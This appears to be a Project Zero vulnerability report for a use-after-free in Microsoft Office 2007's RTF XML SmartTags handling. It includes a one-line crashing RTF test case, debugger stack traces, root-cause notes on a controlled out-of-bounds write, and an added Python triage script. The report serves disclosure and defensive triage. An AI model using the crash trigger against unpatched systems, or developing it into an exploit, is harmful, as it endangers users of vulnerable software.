Starred by 2 users
Status: Fixed
Closed: Apr 2015
Microsoft Office 2007 RTF XML SmartTags use-after-free
Project Member Reported by hawkes@google.com, Jan 21 2015
The following RTF file was observed to crash Microsoft Office 2007:

{\rtf1{\sbys\par\pmartabqr\pmartabqr{\shp}\xmlns1{\protend{\xmlclose}\xmlns2{\xmlclose}\xmlns3{\factoidname#}}}}

Crash:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17fa524c ebx=00000000 ecx=034c932c edx=00000000 esi=001205f0 edi=034c93e4
eip=3125eb26 esp=001205a8 ebp=001205b8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
wwlib!FMain+0x1a577:
3125eb26 8b00             mov     eax,[eax]         ds:0023:17fa524c=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
001205b8 3194cf3d wwlib!FMain+0x1a577
00120614 31518bd8 wwlib!wdCommandDispatch+0x28d20a
00120a3c 31518dbf wwlib!DllGetLCID+0x98032
00120a64 31bbce31 wwlib!DllGetLCID+0x98219
00120a8c 31c6c905 wwlib!DllCanUnloadNow+0x24668
00120ccc 31bbd3f0 wwlib!DllCanUnloadNow+0xd413c
00122398 31271cd4 wwlib!DllCanUnloadNow+0x24c27
00122a68 3129ef3b wwlib!FMain+0x2d725
00123b68 3129e372 wwlib!FMain+0x5a98c
00123bac 31491319 wwlib!FMain+0x59dc3
00126d28 3149103a wwlib!DllGetLCID+0x10773
0012b14c 31490ca7 wwlib!DllGetLCID+0x10494
0012b19c 31490b52 wwlib!DllGetLCID+0x10101
0012e2f8 314909d6 wwlib!DllGetLCID+0xffac
0012e31c 313165d8 wwlib!DllGetLCID+0xfe30
0012f580 313409cb wwlib!FMain+0xd2029
0012f630 31340893 wwlib!FMain+0xfc41c
0012f648 32812493 wwlib!FMain+0xfc2e4
0012f668 32812431 mso!Ordinal6541+0x327
0012f6a0 3275f49c mso!Ordinal6541+0x2c5

Notes:

- Reproduces on Windows Server 2003 (Office 2007). Does not reproduce
on Windows 7 (Office 2010) or Windows 8.1 (Office 2013).

- Opening the test case under Office 2013 results in an error: "This
file contains custom XML elements which are no longer supported by
Word."

- The crash occurs due to an out-of-bounds read. With page heap
disabled, the crash may also be observed at 3194cf42 (which is in the
parent function of the crash at 3125eb26, in wwlib.dll
12.0.6713.5000).

- The crash can subsequently lead to an out-of-bounds write to a
controlled pointer value (at 3194CEF5 in wwlib.dll 12.0.6713.5000).

- The underlying issue appears to be a use-after-free. The first
argument (pushed at 3194CF35) of a function call to 312CCF16 is in a
free state. The relevant free operation was earlier performed by
mso!Ordinal649 (mso.dll 12.0.6683.5000) via the following stack trace
(note that the return addresses 31518bd8 and 31518dbf are in common with
the crashing stack trace):

0011e1c8 312539cc mso!Ordinal649+0x26
0011e1e0 31253935 wwlib!FMain+0xf41d
0011e1f0 31274723 wwlib!FMain+0xf386
0011e204 320e0398 wwlib!FMain+0x30174
0011e2a0 3127fdaf wwlib!DllGetClassObject+0xfbaef
00120490 3129b039 wwlib!FMain+0x3b800
001204b0 31c7805b wwlib!FMain+0x56a8a
001204d4 31c77fce wwlib!DllCanUnloadNow+0xdf892
001205b8 3194cf89 wwlib!DllCanUnloadNow+0xdf805
00120614 31518bd8 wwlib!wdCommandDispatch+0x28d256
00120a3c 31518dbf wwlib!DllGetLCID+0x98032

- Adding control words and destinations can change the dereferenced value.

- Based on a trace of execution we can guess that the XML-related
control words are implicated in the UAF - however this couldn't be
verified with 100% certainty. One hypothesis is that the factoidname
control word holds a stale reference to an XML object that has been
freed after an xmlclose.
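As an added triage aid (this is example code written for this page, not part of the original report or of Project Zero's tooling), the following Python script tokenizes the RTF control words of a document while tracking group nesting depth, and reports occurrences of the custom XML / smart tag control words named above. The "stale factoidname" check is a heuristic derived from the report's hypothesis (a \factoidname that appears while no XML element is open) and is an assumption, as is the extended control word set, which adds \xmlopen and \xmlattr from the RTF specification to the three words the report names. The embedded test case is a copy of the one quoted in the report.

```python
import re
from collections import Counter

# Constructed copy of the RTF test case quoted in the report above.
TEST_CASE = (
    r"{\rtf1{\sbys\par\pmartabqr\pmartabqr{\shp}\xmlns1{\protend{\xmlclose}"
    r"\xmlns2{\xmlclose}\xmlns3{\factoidname#}}}}"
)

# Control words tied to Word's custom XML / smart tag support: the three named
# in the report plus \xmlopen and \xmlattr from the RTF specification.
# Assumption: this set is a triage heuristic, not an exhaustive list.
XML_CONTROL_WORDS = {"xmlns", "xmlclose", "xmlopen", "xmlattr", "factoidname"}

# One RTF token: a control word with optional numeric parameter (and optional
# delimiting space), a control symbol such as \{ or \*, or a bare group brace.
# Matching \{ and \} as control symbols keeps escaped braces from changing depth.
TOKEN_RE = re.compile(r"\\([A-Za-z]+)(-?\d+)? ?|\\([^A-Za-z])|([{}])")


def scan_control_words(rtf):
    r"""Return (control_words, final_depth).

    control_words is a list of (word, depth) in document order, where depth is
    the group nesting level at which the control word occurs. final_depth is
    the brace depth at end of input (0 for a balanced document).
    """
    depth = 0
    words = []
    for m in TOKEN_RE.finditer(rtf):
        word, _param, _symbol, brace = m.groups()
        if brace == "{":
            depth += 1
        elif brace == "}":
            depth -= 1
        elif word is not None:
            words.append((word, depth))
    return words, depth


def stale_factoidname_positions(words):
    r"""Heuristic derived from the report's hypothesis: flag a \factoidname that
    occurs while no XML element is open, i.e. after an \xmlclose or before any
    \xmlopen. Returns indices into `words`.
    """
    open_elements = 0
    flagged = []
    for i, (word, _depth) in enumerate(words):
        if word == "xmlopen":
            open_elements += 1
        elif word == "xmlclose":
            open_elements = max(0, open_elements - 1)
        elif word == "factoidname" and open_elements == 0:
            flagged.append(i)
    return flagged


def triage(rtf):
    """Summarise the XML-related control words found in an RTF document."""
    words, final_depth = scan_control_words(rtf)
    counts = Counter(word for word, _ in words)
    return {
        "balanced": final_depth == 0,
        "xml_hits": [(w, d) for w, d in words if w in XML_CONTROL_WORDS],
        "xml_counts": {w: counts[w] for w in sorted(XML_CONTROL_WORDS) if counts[w]},
        "stale_factoidname": stale_factoidname_positions(words),
    }


if __name__ == "__main__":
    for key, value in triage(TEST_CASE).items():
        print(f"{key}: {value}")
```

Run against the test case, the script reports a balanced document with three \xmlns, two \xmlclose and one \factoidname, and flags the \factoidname because every \xmlclose in the file precedes it with no \xmlopen at all. The tokenizer only classifies tokens; it does not interpret destinations, so treat its output as a triage signal for documents that exercise this code path, not as a verdict.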

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Project Member Comment 1 by hawkes@google.com, Apr 16 2015
Labels: CVE-2015-1651
Status: Fixed
Fixed in MS15-033.
Project Member Comment 2 by hawkes@google.com, Aug 21 2015
Labels: -Restrict-View-Commit